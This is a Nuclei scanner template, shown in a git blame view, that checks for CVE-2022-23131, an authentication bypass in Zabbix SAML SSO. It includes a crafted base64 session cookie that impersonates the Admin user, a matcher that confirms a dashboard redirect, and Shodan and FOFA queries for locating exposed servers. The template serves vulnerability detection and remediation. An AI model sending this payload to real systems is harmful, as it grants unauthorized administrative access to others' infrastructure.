nuclei-templates/cves/2022/CVE-2022-23131.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

2022-02-20 12:37:19 +00:00
id: CVE-2022-23131
info:
2022-02-24 23:23:48 +00:00
name: Zabbix - SAML SSO Authentication Bypass
2022-02-20 12:37:19 +00:00
author: For3stCo1d
2022-02-24 23:34:03 +00:00
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
2022-02-20 12:37:19 +00:00
reference:
- https://support.zabbix.com/browse/ZBX-20350
2022-02-20 12:37:19 +00:00
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
2022-02-24 23:34:03 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
2022-02-25 12:03:39 +00:00
- https://github.com/1mxml/CVE-2022-23131
remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
2022-02-20 12:37:19 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-02-20 12:37:19 +00:00
cvss-score: 9.8
cve-id: CVE-2022-23131
cwe-id: CWE-290
metadata:
fofa-query: app="ZABBIX-监控系统" && body="saml"
shodan-query: http.favicon.hash:892542951
2022-02-25 12:03:39 +00:00
tags: cve,cve2022,zabbix,auth-bypass,saml,sso
2022-02-20 12:37:19 +00:00
requests:
2022-02-25 18:39:07 +00:00
- method: GET
path:
- "{{BaseURL}}/zabbix/index_sso.php"
- "{{BaseURL}}/index_sso.php"
2022-02-20 12:37:19 +00:00
2022-02-25 18:39:07 +00:00
headers:
Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
stop-at-first-match: true
2022-02-20 12:37:19 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 302
2022-02-24 23:23:48 +00:00
- type: dsl
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
# Enhanced by mp on 2022/03/08